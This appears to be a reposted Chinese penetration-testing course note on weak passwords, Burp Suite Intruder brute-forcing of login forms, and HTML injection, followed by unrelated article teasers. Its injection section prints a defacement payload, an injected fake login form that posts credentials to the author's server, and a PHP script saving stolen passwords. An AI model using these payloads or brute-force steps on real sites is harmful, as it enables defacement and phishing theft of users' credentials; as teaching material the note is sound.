day2-web安全漏洞攻防-基础-弱口令、HTML注入(米斯特web渗透测试)

day2-web安全漏洞攻防-基础-弱口令、HTML注入(米斯特web渗透测试)

  • 1,漏洞
  • 2,弱口令
  • 3,爆破
    • (1)Burpsuite
    • (2)攻击类型
  • 4,HTML针剂注入

1,漏洞

  挖掘和利用的是什么东西,漏洞(web应用存在的缺陷)

在这里插入图片描述

  网站的前后端结构,前端是发生在浏览器上的漏洞,后端是发生在服务器上的漏洞
  我们如何区分这些前端后端如HTML注入是前端的,将HTML代码注入到页面中就是前端的一个漏洞。

2,弱口令

  弱口令(既不是前端也不是后端,关系到自己的安全意识,密码弱点)
在这里插入图片描述
  也有第二种弱口令(使用社工,人性的弱点姓名首拼音,出生年月)

  第一种傻瓜型的弱口令,会给你一份字典,总结了很多的常用型的弱口令
  第二种需要使用一款在线的web应用工具,这工具源码会给你们,自己会PHP的也可以自己去读,如果不会PHP的等会安装教你们如何本地使用,这款工具叫密码字典生成工具。这个PHP文件直接放在phpstudy网站根目录下就能本地运行,用本地浏览器可打开。

  因为caimima这个PHP文件未能找到,找到了一个替代性工具safe6社工爆破密码生成器的jar包,已经上传到kali系统中,可以运行。
在这里插入图片描述

  弱口令这么多我们肯定是使用工具的手工不可能一个一个去输入,那所以说,弱口令这个漏洞不是网站的问题,当然网站也有问题(注册时未说明禁止弱口令),一般弱口令在登录处尝试,登录处有账号密码,有些需要验证码、时间限制等先绕过(之后会讲怎么绕过)。

3,爆破

  弱口令有个名称爆破

(1)Burpsuite

  Burpsuite很好用但需要一个java环境
  在kali中打开burpsuite,怎么用它去爆破哪,这边有个模块proxy下有个option设置,将其监听者设置为127.0.0.1。
  首先我们要进入需要暴力破解的登录界面,如我在centos7搭建的一个web网站,打开这个登录界面,然后将火狐浏览器的setting监听设置为本地127.0.0.1。8080端口。准备用burpsuite抓包。
  然后将proxy下的intercept设为on开启。此时burpsuite就处于监听状态了。
  在登录界面随便输入一个账号和密码,就能看到自己抓到的一个包。
  此时就能在burpsuite看到自己抓到的一个包了(这个包是请求报文),这个包在这里显示了说明这个包还没有发送出去,点击forward这个就被发送出去了。第二个drop是丢包,在history可以看到之前抓到的包。丢弃之后点击history中的包,在下方可以看到只有请求包无响应包,说明它并没有发到对应的服务器上。
  抓到包之后我们可以点击action,接着点击send to intruder这样就行了。如果我们不想抓包呢,可以在httphistory中选择一个包,对准下面一个框右键,send to intruder就行了。
  为什么要送到intruder里面,intruder是一个爆破模块,可以提供我们自动的发送http请求,其实我们的的每一个操作在网页上的都是一次http请求,当然有一些也会经过前端JS进行自动请求。
  比如现在已经抓到包了,在intruder的target中可以看到目标,上面的IP是你要爆破的IP,端口是80 端口。
接着进入第二个position模块,你可以看到很多的&符号,先点击右侧clear将&符号清空。首先爆破是在账号和密码上爆破,那么我们爆破是将值改变,只要将值设置为一个变动的量就行了。前后都有&符意思是将后面的当做变量。接着点击add&还原。等会我们说一下怎么设置字典。

(2)攻击类型

我们讲一讲攻击的种类在position模块下的attack type有四种:

  第一种攻击类型sniper:第三个模块payloads是字典的设置,会有个payload set。设置字典是在payload options中设置,有个列表paste是粘贴,我们可以在字典生成器中将生成的txt字典文件打开,ctr+A和ctr+C全选复制后点击paste就将字典内容全部复制进去了。也可以选择load将txt文件导入进去。我们也可以自定义一个字典,点击start attack就开始攻击。以上是第一种攻击类型。第一种攻击类型,发送第0个包是自己输入的,从第一个开始系统改变。是先将你输入的账号改变,密码不改变登录;接着账号不改变,密码改变攻击。

  第二种攻击类型batterring ram再次点击start attack,弹出的界面先不要关闭。用户名和密码都是字典生成的。

  第三种类型也是如此,payload set 可以选择2。好像和第二种攻击没什么区别,但第二个只能设置一个字典,而第三个可以设置两个字典。两者的破译是同步进行的。

  第四种攻击类型,也可以选择2个字典。和第三种攻击方式不同的是两个字典是可以交互交叉发送攻击的。

  一般变量体是两个多个的时候,建议使用交叉式的攻击方式。如爆破账号密码时可使用交叉式,因为名字不确定,密码也不确定。交叉式是所有的结合的字典都给发过去。
  在start attack攻击后弹出的intruder attack界面,发现length为539用户不存在,531密码错误,538OK已经爆破出来了,在下方能看到结果过返回。

4,HTML针剂注入

将HTML的标签代码注入到页面中,页面能解析这个HTML标签代码这才算一个成功的。
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

<table style="left: 0px;top:0px;position:fixed;z-index:5000;position:absolute;width:100%;height:300%;background-color:black;">
		<tbody><tr><td style="color:#FFFFFF;z-index: 6000;vertical-align: top;"><h1>hacked by key</h1></td></tr></tbody>

hacked by key

  HTML代码被解析了,这个漏洞有啥用呢?小明能将这个网站黑掉吗,只要是黑的加上个白字我们就称其被黑掉了,这就是黑页。
  上图中的代码就是HTML代码,但他引用了css层叠样式表,css是用来梅花页面的,此代码就是将网站所有代码覆盖,用一个黑页遮挡住,再写上一些字就是黑掉了。这是什么方式的请求导致的,是get方式请求的,就是url。可以在网上找短链接生成,就能将长链接变成短链接了。这样的只是自娱自乐,别人打开有图,别人不打开此链接,直接访问其网站链接是看不到此黑页的。我们怎么让其打开之后产生危害呢,这边伪造了一个登录框出来,网址不再是姓名提交而是账号密码登录。我们将下图中比较长的请求代码发给此网站的用户、或者朋友,它如果过信了登录了输入了账号密码就能获取到用户的登录密码,为什么在action中做了手脚,将post发给了自己搭建的网站IP,传给了自己的网页并保存此账号密码,并生成一个笔记本。之前QQ空间会有些连接,如果打开了有登录框,对面会将账号密码保存在数据库中这就是钓鱼,不像我自己生成个txt是针对个人的。

在这里插入图片描述

<table style="left: 0px;top: 0px;position: fixed;z-index: 5000;position: absolute;width: 100%;background-color: white;">
		<tr>
			<td>
				<form action="http://127.0.0.1/login.php" method="post">
				账号:<input type="text" name="name"><br>
				密码:<input type="password" name="pwd"><br>
				<input type="submit" value="登录">
				</form>
			</td>
		</tr>
	</table>
账号:
密码:

在这里插入图片描述

<?php
header("content-type:text/html;charset=utf-8");
if (file_put_contents("test.txt", '账号:'.$_POST['name'].'密码:'.$_POST['pwd'],FILE_APPEND)) {
	echo "登录成功";
}
?>

  关于刚刚的弱口令相信知道如何修改弱口令了吧,不仅针对个人弱口令还有企业的弱口令。一个大企业管理较为麻烦,新员工入职给个企业邮箱,给个默认密码baidu@.123,这时新入职员工没改密码就能get到他的账号密码了,这个后期会给个案例,希望不要用于非法途径,内部有安全规则禁止使用此种密码。
  如何修复这种HTML漏洞,下方给出答案,在PHP中最安全的函数。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/736008.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

DataStructure.时间和空间复杂度

时间和空间复杂度 【本节目标】1. 如何衡量一个算法的好坏2. 算法效率3. 时间复杂度3.1 时间复杂度的概念3.2 大O的渐进表示法3.3 推导大O阶方法3.4 常见时间复杂度计算举例3.4.1 示例13.4.2 示例23.4.3 示例33.4.4 示例43.4.5 示例53.4.6 示例63.4.7 示例7 4.空间复杂度4.1 示…

【Java】pcm 与 wav 格式互转工具类 (附测试用例)

文章目录 1. 前言1.1 背景1.2 目标1.3 亮点 2. 用例说明3. 补充验证4. 相关链接 1. 前言 git 仓库 https://github.com/ChenghanY/pcm-wav-converter 1.1 背景 系统新接入语音引擎。 语音引擎只认 pcm 格式数据。前端只认 wav 格式 。 需要后端对 pcm 和 wav 格式实现互转&a…

SpringCloud Alibaba Sentinel中@SentinelResource使用实践总结

Sentinel 提供了 SentinelResource 注解用于定义资源&#xff0c;并提供了 AspectJ 的扩展用于自动定义资源、处理 BlockException 等。 注意&#xff1a;注解方式埋点不支持 private 方法。 【1】资源名称限流 ① controller方法 GetMapping("/byResource") Senti…

汽车网络安全 -- 漏洞该如何管理

目录 1.漏洞获取途径汇总 2.CAVD的漏洞管理规则简析 2.1 通用术语简介 2.2 漏洞评分指标 2.3.1 场景参数 2.3.2 威胁参数 2.3.3 影响参数 2.3 漏洞等级判定 ​3.小结 在汽车网络安全的时代背景下&#xff0c;作为一直从事车控类ECU基础软件开发的软件dog&#xff0c;…

openjudge_2.5基本算法之搜索_917:Knight Moves

题目 917:Knight Moves 总时间限制: 1000ms 内存限制: 65536kB 描述 Background Mr Somurolov, fabulous chess-gamer indeed, asserts that no one else but him can move knights from one position to another so fast. Can you beat him? The Problem Your task is to wr…

利用MSSQL模拟提权

点击星标&#xff0c;即时接收最新推文 本文选自《内网安全攻防&#xff1a;红队之路》 扫描二维码五折购书 利用MSSQL模拟提权 在MS SQL数据库&#xff0c;可以使用EXECUTE AS语句&#xff0c;以其他用户的上下文执行SQL查询。需要注意的是只有明确授予模拟&#xff08;Impers…

线程间通信方式(互斥(互斥锁)与同步(无名信号量、条件变量))

1通信机制&#xff1a;互斥与同步 线程的互斥通过线程的互斥锁完成&#xff1b; 线程的同步通过无名信号量或者条件变量完成。 2 互斥 2.1 何为互斥&#xff1f; 互斥是在多个线程在访问同一个全局变量的时候&#xff0c;先让这个线程争抢锁的资源&#xff0c;那个线程争抢…

学会python——对目录的操作(python实例十)

目录 1、认识Python 2、环境与工具 2.1 python环境 2.2 Visual Studio Code编译 3、遍历当前目录 3.1 代码构思 3.2 代码示例 3.3 运行结果 4、删除目录中的文件 4.1 代码构思 4.2 代码示例 4.3 运行结果 5、总计 1、认识Python Python 是一个高层次的结合了解释性…

Linux-安装及管理程序

目录 一、Linux应用程序基础 1、应用程序与系统命令的关系 2、 典型应用程序的目录结构 3、常见的软件包封装类型 二、RPM包管理工具 1、RPM包管理器 2、RPM软件包 ​3、RPM的命令格式 4、RPM命令的常用选项 5、RPM安装 三、 yum安装 1、yum源介绍 1.1、本地yum源 …

ClosedXML

一、类库介绍 ClosedXML是一个用于读取、操作和写入Excel 2007 (.xlsx, .xlsm)文件的.NET第三方库。它基于OpenXML&#xff0c;但与OpenXML相比&#xff0c;ClosedXML具有更高的性能和更易于使用的API接口。 ClosedXML支持XML文档的解析和生成&#xff0c;可以处理复杂的XML结…

程序员如何高效读代码?

程序员高效读代码的技巧包括以下几点&#xff1a; 明确阅读目的&#xff1a;在开始阅读代码之前&#xff0c;先明确你的阅读目的。是为了理解整个系统的架构&#xff1f;还是为了修复一个具体的bug&#xff1f;或者是为了了解某个功能是如何实现的&#xff1f;明确目的可以帮助…

系统安全设计规范(Word原件)

1.1安全建设原则 1.2 安全管理体系 1.3 安全管理规范 1.4 数据安全保障措施 1.4.1 数据库安全保障 1.4.2 操作系统安全保障 1.4.3 病毒防治 1.5安全保障措施 1.5.1实名认证保障 1.5.2 接口安全保障 1.5.3 加密传输保障 1.5.4终端安全保障 资料获取&#xff1a;私信或者进主页。…

示例:WPF中推荐一个支持折叠展开的GridSpliter自定义控件GridSplitterBox

一、目的&#xff1a;推荐一个支持折叠展开的GridSpliter自定义控件GridSplitterBox 二、效果 实现功能&#xff1a;设置菜单显示位置&#xff0c;最小宽度&#xff0c;最大宽度&#xff0c;位置持久化保存 三、环境 VS2022 Net7 四、使用方式 1、安装nuget包&#xff1a;H…

能理解你的意图的自动化采集工具——AI和爬虫相结合

⭐️我叫忆_恒心&#xff0c;一名喜欢书写博客的研究生&#x1f468;‍&#x1f393;。 如果觉得本文能帮到您&#xff0c;麻烦点个赞&#x1f44d;呗&#xff01; 近期会不断在专栏里进行更新讲解博客~~~ 有什么问题的小伙伴 欢迎留言提问欧&#xff0c;喜欢的小伙伴给个三连支…

pytest测试框架flaky插件重试失败用例

Pytest提供了丰富的插件来扩展其功能&#xff0c;本章介绍下插件flaky &#xff0c;用于在测试用例失败时自动重新运行这些测试用例。与前面文章介绍的插件pytest-rerunfailures功能有些类似&#xff0c;但是功能上不如pytest-rerunfailures插件丰富。 flaky官方并没有明确pyt…

中国企业数字化转型现状、趋势和挑战

一、来自不同行业、不同所有制的145家企业的调查 为了了解中国企业数字化转型的现状、趋势和挑战&#xff0c;2022年我们完成了一次在线问卷调查。 受访企业达145家&#xff0c;国内企业111家&#xff0c;占比77%&#xff08;其中央企占总比例51%&#xff09;&#xff0c;民营…

【Python机器学习】k均值聚类——矢量量化,或者将k均值看作分解

虽然k均值是一种聚类算法&#xff0c;但在k均值和分解方法之间存在一些相似之处。k均值尝试利用簇中心来表示每个数据点&#xff0c;可以看作仅用一个分量来表示每个数据点&#xff0c;该分量由簇中心给出。这种观点将k均值看作是一种分解方法&#xff0c;其中每个点用单一分量…

【计算机组成原理】部分题目汇总

计算机组成原理 部分题目汇总 一. 简答题 RISC和CICS 简要说明&#xff0c;比较异同 RISC&#xff08;精简指令集&#xff09;注重简单快速的指令执行&#xff0c;使用少量通用寄存器&#xff0c;固定长度指令&#xff0c;优化硬件性能&#xff0c;依赖软件&#xff08;如编译…

Adobe Acrobat 编辑器软件下载安装,Acrobat 轻松编辑和管理各种PDF文件

Adobe Acrobat&#xff0c;它凭借卓越的功能和丰富的工具&#xff0c;为用户提供了一个全面的解决方案&#xff0c;用于查看、创建、编辑和管理各种PDF文件。 作为一款专业的PDF阅读器&#xff0c;Adobe Acrobat能够轻松打开并展示各种格式的PDF文档&#xff0c;无论是文字、图…

软考初级网络管理员__软件单选题

1.在Excel 中&#xff0c;设单元格F1的值为56.323&#xff0c;若在单元格F2中输入公式"TEXT(F1,"&#xffe5;0.00”)”&#xff0c;则单元格F2的值为()。 &#xffe5;56 &#xffe5;56.323 &#xffe5;56.32 &#xffe5;56.00 2.要使Word 能自动提醒英文单…